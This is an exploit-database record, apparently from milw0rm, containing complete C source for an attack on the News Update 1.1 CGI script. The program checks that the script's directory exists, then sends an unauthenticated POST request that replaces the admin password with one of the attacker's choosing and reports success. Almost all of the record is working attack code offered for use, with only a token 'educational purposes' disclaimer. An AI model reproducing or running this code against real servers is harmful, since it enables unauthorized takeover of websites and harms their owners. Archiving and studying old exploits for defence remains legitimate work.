{"lastseen": "2020-04-01T19:04:37", "references": [], "description": "\nNews Update 1.1 - Change Admin Password", "edition": 1, "reporter": "morpheus[bd]", "exploitpack": {"type": "webapps", "platform": "cgi"}, "published": "2000-11-15T00:00:00", "title": "News Update 1.1 - Change Admin Password", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2000-11-15T00:00:00", "id": "EXPLOITPACK:6959190907747447427C4A46016C7F0A", "href": "", "viewCount": 3, "sourceData": "/***************************************************************************\n news_exp.c - description\n -------------------\n begin : Sat Oct 21 2000\n copyright : (C) 2000 by Morpheus[bd]\n email : morpheusbd@gmx.net\n advisory\t\t : www.brightdarkness.de\n\n Exploit code for the News Update 1.1 by Morpheus[bd]\n For more information see my advisory which should be in this .tar.gz\n package.\n\n Compiling/Linking: gcc exploit.c -o exploit\n Usage: will be printed when the exploit is started without arguments\n\n ***************************************************************************/\n\n/***************************************************************************\n [Disclaimer]\n Standard disclaimer applies here. Do not use this program. This program\n is only for educational purposes. Use it on your on risk.\n\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. 
*\n * *\n ***************************************************************************/\n\n#include <stdio.h>\n#include <string.h>\n#include <ctype.h>\n#include <stdlib.h>\n#include <netdb.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <errno.h>\n#include <fcntl.h>\n#include <signal.h>\n#include <arpa/nameser.h>\n#include <sys/stat.h>\n\n#define\t\t\tWEISS\t\t printf(\"\\033[0;29m\")\n#define ROT printf(\"\\033[1;31m\")\n#define \tGRUEN printf(\"\\033[1;32m\")\n#define\t\t GELB printf(\"\\033[1;33m\")\n#define\t\t\tBLAU\t\t printf(\"\\033[1;34m\")\n#define\t\t\tLILA\t\t printf(\"\\033[1;35m\")\n#define \tHELLROT printf(\"\\033[1;36m\")\n\n#define MAXBUFFER 4096\n\n/******************* AUSGABEN ************************/\n\n/* At the moment everything will be written to the STDOUT */\n\n#define EXPLOIT_INFO\t\t2 /* If you only want Exploit infos ... change it to 1 and DEBUG to 1 */\n#define\tDEBUG_INFO\t\t2 /* If you only want Debug infos ... change DEBUG to 2 */\n\n#define\tDEBUG\t\t\t2\n\n/*****************************************************/\n\n/* Standard-Pfad des News Update scripts */\n#define\tNEWSUPDATE_PATH\t\"/cgi-bin/dummy/newsup\"\n\n/* Name des News Update scripts */\n#define\tNEWS_UPDATE\t\"newsup.pl\"\n\n/* Das gewünschte Passwort für die News Update Form */\n#define\tPWD\t\t\"morpheus\"\n\n/* HTTP-Request für 
die News Update Form */\n#define\tNEWS_UPDATE_PWD\t\"POST %s HTTP/1.0\\r\\n\" \\\n\t\t\t\"Host: %s\\r\\n\" \\\n\t\t\t\"Referrer: %s\\r\\n\" \\\n\t\t\t\"Connection: Close\\r\\n\" \\\n\t\t\t\"User-Agent: %s\\r\\n\" \\\n\t\t\t\"Accept: */*\\r\\n\" \\\n\t\t\t\"Content-type: application/x-www-urlencoded\\r\\n\" \\\n\t\t\t\"Content-length: %d\\r\\n\" \\\n\t\t\t\"\\r\\n\" \\\n\t\t\t\"pwd=%s&pwd2=%s&setpwd=++Set+Password++\\r\\n\" \\\n\t\t\t\"\\r\\n\"\n\n/* Ein einfacher HTTP-Request um eine Datei von einem Web-Server zu saugen */\n#define SIMPLE_REQUEST\t\"GET %s HTTP/1.0\\r\\n\" \\\n\t\t\t\"Host: %s\\r\\n\" \\\n\t\t\t\"\\r\\n\"\n\n#define BROWSER \"Morphi-Browser (X11; U; Linux 2.4 i686)\"\n\nssize_t writen(int fd, const void *vptr, size_t n)\n/* Taken from UNIX Network Programming - Vol. I by W.R. Stevens */\n {\n size_t nleft;\n ssize_t nwritten;\n const char *ptr;\n\n ptr = vptr;\n nleft = n;\n while(nleft > 0) {\n if ( (nwritten = write(fd, ptr, nleft)) <= 0) {\n if (errno == EINTR)\n nwritten = 0;\n else\n return (-1);\n }\n nleft -= nwritten;\n ptr += nwritten;\n }\n return (n);\n }\n\nstatic ssize_t my_read(int fd, char *ptr)\n/* Taken from UNIX Network Programming - Vol. I by W.R. Stevens */\n{\n\tstatic int\tread_cnt = 0;\n\tstatic char\t*read_ptr;\n\tstatic char\tread_buf[4096];\n\n\tif (read_cnt <= 0) {\nagain:\n\t\tif ( (read_cnt = read(fd, read_buf, sizeof(read_buf))) < 0) {\n\t\t if (errno == EINTR)\n\t\t goto again;\n\t\t\treturn(-1);\n\t\t} else if (read_cnt == 0)\n\t\t\treturn(0);\n\t\tread_ptr = read_buf;\n\t}\n\n\tread_cnt--;\n\t*ptr = *read_ptr++;\n\treturn(1);\n}\n\nssize_t readline(int fd, void *vptr, size_t maxlen)\n/* Taken from UNIX Network Programming - Vol. I by W.R. 
Stevens */\n{\n\tint\t\tn, rc;\n\tchar\tc, *ptr;\n\n\tptr = vptr;\n\tfor (n = 1; n < maxlen; n++) {\n\t\tif ( (rc = my_read(fd, &c)) == 1) {\n\t\t\t*ptr++ = c;\n\t\t\tif (c == '\\n')\n\t\t\t\tbreak;\t/* newline is stored, like fgets() */\n\t\t} else if (rc == 0) {\n\t\t\tif (n == 1)\n\t\t\t\treturn(0);\t/* EOF, no data read */\n\t\t\telse\n\t\t\t\tbreak;\t\t/* EOF, some data was read */\n\t\t} else\n\t\t\treturn(-1);\t\t/* error, errno set by read() */\n\t}\n\n\t*ptr = 0;\t/* null terminate like fgets() */\n\treturn(n);\n}\n\n/* Stellt die Verbindung zum HTTP-Port des Servers her */\nint http_connection(char host[100])\n {\n struct sockaddr_in sa;\n struct hostent *hp;\n\n int sockfd;\n int port = 80;\n\n sockfd = socket(AF_INET, SOCK_STREAM, 0);\n bzero(&sa, sizeof(sa));\n sa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n if ( (sa.sin_addr.s_addr = inet_addr(host)) == -1)\n {\n if ( (hp = (struct hostent *) gethostbyname(host)) == NULL)\n {\n ROT;\n perror(\"gethostbyname:\");\n WEISS;\n return (-1);\n }\n memcpy(&sa.sin_addr.s_addr,hp->h_addr,sizeof(hp->h_addr));\n }\n\n if (connect(sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0)\n {\n ROT;\n perror(\"Connect:\");\n close(sockfd);\n WEISS;\n return (-1);\n }\n return sockfd;\n }\n\n\n/* Exploited das News Update script und schleust ein neues Password ein */\nint news_update_exploit(char *host, char *path)\n {\n int i = 0, sockfd = 0;\n char cmd[MAXBUFFER];\n\n if ((sockfd = http_connection(host)) == -1) { ROT; printf(\"Damn ... no connection to %s\\n\", host); WEISS; return; }\n\n i = snprintf(cmd, sizeof(cmd), NEWS_UPDATE_PWD, path, host, \"www.brightdarkness.de\", BROWSER, 34 + strlen(PWD), PWD, PWD);\n GELB;\n if (DEBUG == DEBUG_INFO) { GELB; printf(\"Sending following request to %s[%d]:\\n%s\", host, 80, cmd); WEISS; }\n WEISS;\n if (writen(sockfd, cmd, i) == -1)\n {\n ROT;\n printf(\"Man, man, man ....... Ihr verdammten Idioten .... 
kann man hier nicht mal in Ruhe writen() ?\\n\");\n WEISS;\n exit(-1);\n }\n\n GELB;\n if (DEBUG == DEBUG_INFO) printf(\"Output from Server:\\n\");\n WEISS;\n while (readline(sockfd, cmd, MAXBUFFER) != 0)\n {\n \tBLAU;\n \tif (DEBUG == DEBUG_INFO) printf(\"%s\", cmd);\n \tWEISS;\n \tif (strstr(cmd, \"Password Success\") != NULL)\n \t {\n \t GRUEN;\n \t if (DEBUG == EXPLOIT_INFO) printf(\"Exploit: Success!!!!\\n\");\n \t if (DEBUG == EXPLOIT_INFO) printf(\"The new password: %s\\n\", PWD);\n \t WEISS;\n \t return (0);\n \t }\n }\n ROT;\n if (DEBUG == EXPLOIT_INFO) printf(\"Exploit: failed.\\n\");\n WEISS;\n return (-1);\n }\n\n/* How to use this fucking lame proggy *rofl* */\nvoid usage(char *arg)\n {\n ROT;\n printf(\"news_update_exploit - News Update Password Changer - v0.1\\n\");\n printf(\"------------=====||| by Morpheus[bd] |||=====------------\\n\");\n GELB;\n printf(\"\\nUsage:\");\n GRUEN;\n printf(\"%s host/ip [path]\\n\\n\", arg);\n printf(\"path: alternative path to the newsup.pl\\n\");\n WEISS;\n exit(-1);\n }\n\n/* Existiert das Verzeichnis der Form überhaupt ? */\nint check_directory(char *host, char *ptr)\n {\n int i = 0, sockfd = 0;\n char cmd[MAXBUFFER], *ptr2;\n\n ptr2 = ptr + strlen(ptr);\n if (*(ptr2 - 1) != '/')\n {\n *ptr2 = '/';\n *(ptr2 + 1) = '\\0';\n }\n\n GELB;\n if (DEBUG == DEBUG_INFO) printf(\"Checking if %s exists on the target server...\\n\", ptr);\n WEISS;\n\n if ((sockfd = http_connection(host)) == -1) { ROT; printf(\"Damn !!!... No connection to %s.\\n\", host); WEISS; return; }\n\n i = snprintf(cmd, sizeof(cmd), SIMPLE_REQUEST, ptr, host);\n GELB;\n if (DEBUG == DEBUG_INFO) printf(\"Sending following request to %s[%d]:\\n%s\", host, 80, cmd);\n WEISS;\n if (writen(sockfd, cmd, i) == -1)\n {\n ROT;\n printf(\"Man, man, man ....... Ihr verdammten Idioten .... 
kann man hier nicht mal in Ruhe writen() ?\\n\");\n WEISS;\n exit(-1);\n }\n\n if (readline(sockfd, cmd, MAXBUFFER) == 0)\n {\n ROT;\n printf(\"Error: Reading from HTTP Server.\\n\");\n WEISS;\n exit(-1);\n }\n if (strstr(cmd, \"404\") == NULL)\n {\n GRUEN;\n if (DEBUG == DEBUG_INFO) printf(\"The directory was found.\\n\");\n WEISS;\n while (readline(sockfd, cmd, MAXBUFFER) != 0);\n close(sockfd);\n return (0);\n }\n\n if (DEBUG == DEBUG_INFO) printf(\"The directory was NOT found.\\n\");\n while (readline(sockfd, cmd, MAXBUFFER) != 0);\n close(sockfd);\n return (-1);\n }\n\n/* Das tolle Hauptprogramm *fg* */\nint main(int argc, char **argv)\n {\n char buf[MAXBUFFER];\n\n if (argc < 2)\n {\n usage(argv[0]);\n }\n\n if (argc >= 3)\n {\n /* Ein alternatives Verzeichnis wurde als Parameter übergeben */\n strncpy(buf, argv[2], sizeof(buf));\n if (check_directory(argv[1], buf) == -1)\n {\n ROT;\n printf(\"Error: The given directory was not found.\\nPlease provide a different directory.\\n\");\n WEISS;\n exit(-1);\n }\n strcat(buf, NEWS_UPDATE);\n }\n else\n {\n /* Kein alternatives Verz. angegeben, benutze Standard-Verzeichnis */\n strncpy(buf, NEWSUPDATE_PATH, sizeof(buf));\n if (check_directory(argv[1], buf) == -1)\n {\n ROT;\n printf(\"Error: The given directory was not found.\\nPlease provide a different directory.\\n\");\n WEISS;\n exit(-1);\n }\n strcat(buf, NEWS_UPDATE);\n }\n\n /* Let's rock !!!! */\n news_update_exploit(argv[1], buf);\n return (0);\n }\n\n\n// milw0rm.com [2000-11-15]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645533525, "score": 1659818015}, "_internal": {"score_hash": "fc2a799abb09ebad9a31b6d7f0472a52"}}